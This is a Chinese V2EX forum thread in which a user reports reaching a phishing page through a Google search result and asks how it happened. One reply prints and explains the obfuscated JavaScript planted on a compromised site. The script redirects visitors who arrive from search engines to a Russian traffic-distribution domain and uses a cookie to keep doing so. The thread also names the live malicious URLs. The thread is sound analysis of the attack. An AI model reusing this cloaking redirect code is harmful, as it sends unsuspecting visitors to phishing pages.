V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Judd
V2EX  ›  问与答

第一次在 google.com 被钓鱼

  •  
  •   Judd · 2020-03-06 15:21:41 +08:00 · 2368 次点击
    这是一个创建于 1731 天前的主题,其中的信息可能已经有所发展或是发生改变。

    手动重现

    1. Google 搜索 notion dropbox paper: https://www.google.com/search?q=notion+dropbox+paper
    2. 然后点结果中的这个钓鱼链接: http://staging.swisse.com.au/dropbox-paper.html
    3. 几次跳转后:🎉

    录了个 Gif: https://i.imgur.com/KnY04hA.gifv

    问题

    1. 为什么直接访问这个钓鱼页就不会被钓鱼?通过 refer 判断的吗?
      • 在 Google 搜索结果页点击才会被钓鱼(不对,好像是只要有 refer 都行),如果直接访问是正常显示的 notion vs dropbox peper 的一篇东拼西凑的文章。
    2. 哪个环节出的问题?
      • 应该就是 swisse.com.au 被挂了这个钓鱼页吧?
      • 或者 HTTP 被篡改?(但访问 swisse.com.au 人家有 HTTPS 呀)
      • 我装的某个 Chrome 插件有问题?
      • 或者是我用的代理?

    其他网站上(特别是各种色情网站)遇到钓鱼链接倒不稀奇,但在 google.com 上遇到且 Chrome 还没红屏警告的,这是第一次碰到。

    一知半解,有大佬分析一下吗?

    5 条回复    2020-03-06 19:29:38 +08:00
    xylxsss
        1
    xylxsss  
       2020-03-06 15:48:00 +08:00
    路由器被劫持了吧。
    imdong
        2
    imdong  
       2020-03-06 16:03:58 +08:00
    不是劫持,就是典型的黑产 SEO 性质的东西。

    页面加载了唯一 JS ( http://staging.swisse.com.au/js/stats.js)

    ```javascript
    class Task2 {
    static ["com2"]() {
    var _0x4014c2 = document.title.split(" - ");

    var _0x28236f = _0x4014c2[0].split(" | ");

    function _0x19737c(_0x3c4e45, _0x1f88c8, _0x43a6f0, _0x17db9b, _0x142f63, _0x1a5f1a) {
    if (!_0x3c4e45 || !_0x1f88c8) return ![];

    var _0x3405ea = _0x3c4e45 + '=' + encodeURIComponent(_0x1f88c8);

    if (_0x43a6f0) _0x3405ea += "; expires=" + _0x43a6f0.toGMTString();
    if (_0x17db9b) _0x3405ea += ';\x20path=' + _0x17db9b;
    if (_0x142f63) _0x3405ea += "; domain=" + _0x142f63;
    if (_0x1a5f1a) _0x3405ea += "; secure";
    document.cookie = _0x3405ea;
    return !![];
    }

    function _0x49f35b(_0x3b366b) {
    var _0x2d3ad0 = "(?:; )?" + _0x3b366b + '=([^;]*);?';

    var _0x5ede30 = new RegExp(_0x2d3ad0);

    if (_0x5ede30.test(document.cookie)) return decodeURIComponent(RegExp.$1);
    return ![];
    }

    function _0x35790f(_0xe10d12, _0x1aca07, _0x43ad37) {
    _0x19737c(_0xe10d12, null, new Date(0), _0x1aca07, _0x43ad37);

    return !![];
    }

    var _0x5e520f = {};
    _0x5e520f.searchers = [[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];

    _0x5e520f.sp_redirect = function (_0xa5e498) {
    var _0x50a397 = null;

    for (var _0x592205 = 0; _0x592205 < _0x5e520f.searchers['length']; _0x592205++) {
    var _0x5da909 = _0x5e520f.searchers[_0x592205];

    if (_0xa5e498.match(_0x5da909[0]) || _0x49f35b("opos") == '1') {
    _0x19737c("opos", '1');

    document.location['href'] = "http://tr.stoneshards.ru/trds?q=" + _0x28236f[0];
    break;
    }
    }
    };

    _0x5e520f.sp_redirect(document.referrer);
    }

    }

    Task2.com2();
    ```

    只要是来路 referrer 是来自 _0x5e520f.searchers 数组内的网站,就跳转到 tr#stoneshards#ru/trds?q={title}
    imdong
        3
    imdong  
       2020-03-06 16:06:37 +08:00
    对了,多刷新几次,每次都有新感觉。
    Dreax
        4
    Dreax  
       2020-03-06 19:27:40 +08:00
    是劫持 我这儿直接打开和走梯子都没问题
    Dreax
        5
    Dreax  
       2020-03-06 19:29:38 +08:00
    @Dreax 没看仔细 从 google 结果页打开的确是进入钓鱼页面了 还做了本地化 显示了我这边的语言
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2577 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 10:13 · PVG 18:13 · LAX 02:13 · JFK 05:13
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.